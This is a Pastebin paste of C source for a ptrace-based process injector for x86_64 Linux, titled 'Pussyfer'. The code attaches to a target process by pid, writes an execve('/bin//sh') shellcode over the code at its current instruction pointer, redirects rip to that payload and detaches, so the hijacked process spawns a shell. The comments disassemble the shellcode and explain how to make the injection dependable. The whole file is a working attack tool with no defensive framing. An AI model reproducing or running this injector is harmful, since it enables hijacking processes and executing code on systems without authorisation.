Pussyfer

a guest
Aug 10th, 2020
77
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.06 KB | None | 0 0
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include <sys/ptrace.h>
#include <sys/reg.h>
#include <sys/types.h>
#include <sys/user.h>
#include <sys/wait.h>
#include <unistd.h>
  13.  
  14.  
  15.  
/*
 * x86_64 Linux payload, 23 bytes, none of them 0x00.  Decoded from the
 * bytes below, it builds "/bin//sh" on the stack and calls execve(2):
 *   48 31 f6                 xor  rsi, rsi        ; argv = NULL
 *   56                       push rsi             ; NUL terminator for the path
 *   48 bf 2f 62 69 6e 2f 2f 73 68
 *                            mov  rdi, "/bin//sh"
 *   57                       push rdi
 *   54 5f                    push rsp ; pop rdi   ; rdi -> "/bin//sh"
 *   6a 3b 58                 push 59  ; pop rax   ; rax = SYS_execve
 *   99                       cdq                  ; rdx (envp) = 0
 *   0f 05                    syscall
 * The string literal appends a trailing NUL that is not part of the payload;
 * because no payload byte is 0x00, strlen() and sizeof-1 both yield 23.
 */
unsigned char shellcode[] = \
"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05";
  18.  
  19.  
  20.  
  21.  
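/*
 * Copy `len` bytes from `src` into the tracee's address space at `dst`.
 *
 * PTRACE_POKETEXT writes one machine word (sizeof(long)) per call, so the
 * copy proceeds word by word.  A trailing partial word is merged with the
 * bytes already present in the tracee (read back with PTRACE_PEEKTEXT) so
 * that nothing past `dst + len` is clobbered.  Each word is assembled with
 * memcpy rather than by casting `src` to a wider pointer type, which avoids
 * strict-aliasing and alignment problems, and it is passed as a full word:
 * the data argument of POKETEXT is word-sized, not 32-bit.
 *
 * pid: tracee, already attached and in ptrace-stop.
 * src: bytes to write.
 * dst: address inside the tracee at which to write.
 * len: number of bytes to write; 0 is a no-op that returns 0.
 *
 * Returns 0 on success, -1 on the first ptrace failure (errno is left set
 * and a diagnostic has already been printed with perror).
 */
static int
inject_data (pid_t pid, const unsigned char *src, void *dst, size_t len)
{
  unsigned char *where = dst;
  size_t         done = 0;

  while (done < len)
    {
      size_t chunk = len - done;
      long   word;

      if (chunk >= sizeof word)
        {
          chunk = sizeof word;
          memcpy (&word, src + done, sizeof word);
        }
      else
        {
          /* Partial trailing word: read-modify-write so the tracee's bytes
             after the payload survive.  PEEKTEXT returns -1 both for the
             value -1 and on error, so errno is the only error signal. */
          errno = 0;
          word = ptrace (PTRACE_PEEKTEXT, pid, where + done, NULL);
          if (word == -1 && errno != 0)
            {
              perror ("ptrace(PEEKTEXT):");
              return -1;
            }
          memcpy (&word, src + done, chunk);
        }

      if (ptrace (PTRACE_POKETEXT, pid, where + done, (void *) word) < 0)
        {
          perror ("ptrace(POKETEXT):");
          return -1;
        }
      done += chunk;
    }
  return 0;
}

/*
 * Usage: <prog> pid
 *
 * Attaches to `pid` with ptrace, overwrites the code at the tracee's current
 * instruction pointer with `shellcode`, points rip at the payload and
 * detaches so the tracee executes it.  The code originally at that address
 * is neither saved nor restored, so the target does not resume its normal
 * work afterwards.
 *
 * Returns 0 on success.  Exits with status 1 on a usage error, on a pid that
 * is not a positive integer, or on any ptrace failure; once attached, every
 * error path detaches before exiting so the tracee is not left stopped under
 * this tracer.  ptrace(ATTACH) fails with EPERM when the caller is not
 * allowed to trace the target (e.g. different uid or a restrictive Yama
 * ptrace_scope).
 */
int
main (int argc, char *argv[])
{
  pid_t                   target;
  struct user_regs_struct regs;
  int                     status;
  char                   *end;
  long                    pid_value;
  /* sizeof rather than strlen: strlen would stop at the first NUL byte of
     a payload, silently truncating it. */
  const size_t            shellcode_size = sizeof shellcode - 1;

  if (argc != 2)
    {
      fprintf (stderr, "Usage:\n\t%s pid\n", argv[0]);
      exit (1);
    }

  /* strtol instead of atoi: reject empty strings, trailing junk, zero,
     negative values and anything that does not fit a pid_t. */
  errno = 0;
  pid_value = strtol (argv[1], &end, 10);
  if (errno != 0 || end == argv[1] || *end != '\0'
      || pid_value <= 0 || pid_value > INT_MAX)
    {
      fprintf (stderr, "Invalid pid: %s\n", argv[1]);
      exit (1);
    }
  target = (pid_t) pid_value;

  printf ("+ Tracing process %d\n", target);
  if (ptrace (PTRACE_ATTACH, target, NULL, NULL) < 0)
    {
      perror ("ptrace(ATTACH):");
      exit (1);
    }

  /* Wait for this tracee specifically and confirm it actually entered
     ptrace-stop; wait(NULL) would accept any child and report nothing. */
  printf ("+ Waiting for process...\n");
  if (waitpid (target, &status, 0) < 0)
    {
      perror ("waitpid:");
      goto fail;
    }
  if (!WIFSTOPPED (status))
    {
      fprintf (stderr, "Process %d did not enter ptrace-stop\n", target);
      exit (1);
    }

  printf ("+ Getting Registers\n");
  if (ptrace (PTRACE_GETREGS, target, NULL, &regs) < 0)
    {
      perror ("ptrace(GETREGS):");
      goto fail;
    }

  printf ("+ Injecting shell code at %p\n", (void *) regs.rip);
  if (inject_data (target, shellcode, (void *) regs.rip, shellcode_size) < 0)
    goto fail;

  /* NOTE(review): the +2 compensates for the kernel rewinding rip by the
     length of the `syscall` instruction when it restarts a system call the
     tracee was blocked in at attach time.  This assumes the target was
     inside a syscall; a target stopped in ordinary user code would resume
     two bytes into the payload.  Left as in the original. */
  regs.rip += 2;

  printf ("+ Setting instruction pointer to %p\n", (void *) regs.rip);
  if (ptrace (PTRACE_SETREGS, target, NULL, &regs) < 0)
    {
      /* Was mislabelled "GETREGS" in the original diagnostic. */
      perror ("ptrace(SETREGS):");
      goto fail;
    }
  printf ("+ Run it!\n");

  if (ptrace (PTRACE_DETACH, target, NULL, NULL) < 0)
    {
      perror ("ptrace(DETACH):");
      exit (1);
    }
  return 0;

fail:
  /* Best-effort release of the tracee on the error path; a failure here is
     not reported separately because we are already exiting with an error. */
  ptrace (PTRACE_DETACH, target, NULL, NULL);
  exit (1);
}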